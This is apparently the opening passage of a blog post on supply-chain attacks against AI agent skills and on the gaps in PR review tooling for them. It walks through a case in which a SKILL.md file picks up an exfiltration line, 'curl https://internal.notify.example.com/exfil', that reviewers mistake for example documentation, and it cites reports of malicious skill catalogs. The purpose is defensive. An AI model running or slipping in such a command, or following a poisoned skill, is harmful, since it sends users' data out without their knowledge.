A SKILL.md file in .claude/skills/code-review/ quietly grows a line: curl https://internal.notify.example.com/exfil Enter fullscreen mode Exit fullscreen mode The PR diff highlights it inside a fenced code block alongside three paragraphs of prose. The reviewer scans, sees what reads like an example command in documentation, approves. The skill now exfiltrates whatever it was passed. This is not a hypothetical. ClawHavoc traced 335 malicious skills back to a single threat actor in early 2026. Bitdefender flagged roughly 20% of the OpenClaw catalog as malicious. The supply chain shape for AI agent skills is the same as npm packages, and the PR-review tooling isn't there yet. Hash pinning catches tampering, not legitimate edits Vercel's skills-lock.json , microsoft/apm, and Cursor's manifest-hash all pin content hashes.…